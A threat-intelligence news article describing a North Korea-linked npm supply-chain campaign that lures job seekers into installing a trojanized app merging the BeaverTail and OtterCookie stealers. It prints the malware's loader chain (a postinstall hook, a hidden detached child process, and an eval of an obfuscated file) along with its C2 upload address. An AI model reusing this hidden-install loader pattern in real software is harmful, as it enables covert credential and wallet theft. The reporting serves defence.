A new information-stealer has emerged targeting job seekers with a trojanized Node.js application named Chessfi.
Delivered via a modified npm package hosted on the official repository, the malware blends two previously separate tools—BeaverTail and OtterCookie—into a unified JavaScript payload.
Victims are lured through fake employment offers and asked to install the application under the guise of a coding assessment, unknowingly triggering malicious scripts that harvest credentials, cryptocurrency wallets and user activity.
Cisco Talos analysts identified the campaign when investigating unusual outbound traffic from a compromised system.
They found that a post-installation script in the node-nvm-ssh package spawns a hidden child process that deobfuscates and evaluates a large JavaScript payload.
This payload merges BeaverTail’s browser extension enumeration and InvisibleFerret Python downloader with OtterCookie’s remote shell, file exfiltration, clipboard and now keylogging modules.
Once executed, the combined malware establishes a connection to a command-and-control server over socket.io.
The attacker can remotely issue commands, steal files matching a wide range of patterns—from .env and .docx to cryptocurrency extension directories—and execute shell commands.
Meanwhile, the keylogging component captures every keystroke and takes periodic desktop screenshots before uploading them to the C2 server along with clipboard contents.
Sustained network activity
Infected systems show sustained network activity on high-numbered TCP ports, often 1418 for socket.io and 1478 for keylog uploads.
The malware creates a temporary folder named windows-cache and writes keystrokes to 1.tmp every second, while screenshots are saved as 2.jpeg every four seconds.
Using the Node.js packages node-global-key-listener, screenshot-desktop and sharp, the module configures listeners for key events and schedules screenshot captures, then bundles and sends the data to hxxp://172.86.88.188:1478/upload.
In addition to credential theft and remote shell access, the campaign's infection mechanism employs a multi-stage chain to evade detection. After cloning the repository, a malicious postinstall script in package.json executes the skip script:
"scripts": {
  "postinstall": "npm run test && npm run transpile && npm run skip"
}
The skip command invokes node testfixtures/eval, which by default loads index.js. That script spawns a detached child process running file15.js:
const path = require('path');
const { spawn } = require('child_process');
// Launch file15.js with the current node binary, detached and with no stdio so nothing surfaces in the install output
const filePath = path.join(__dirname, 'node_modules', 'file15.js');
const child = spawn(process.execPath, [filePath], { detached: true, stdio: 'ignore' });
Finally, file15.js reads and evaluates the content of test.list using eval, revealing the combined BeaverTail and OtterCookie modules:
const fs = require('fs');
const path = require('path');
// test.list holds the obfuscated payload; it is never written to a .js file, only evaluated in memory
const filePath = path.join(__dirname, 'test.list');
fs.readFile(filePath, 'utf8', (err, data) => { eval(data); });
This convoluted chain—cloning a Git repository, running benign-looking npm scripts, spawning hidden processes and dynamically evaluating an obfuscated payload—underscores the sophisticated infection mechanism.
By merging BeaverTail’s stealthy Python payload downloader and OtterCookie’s modular information-stealer, Famous Chollima has crafted a versatile malware that leverages familiar developer workflows to compromise unsuspecting victims.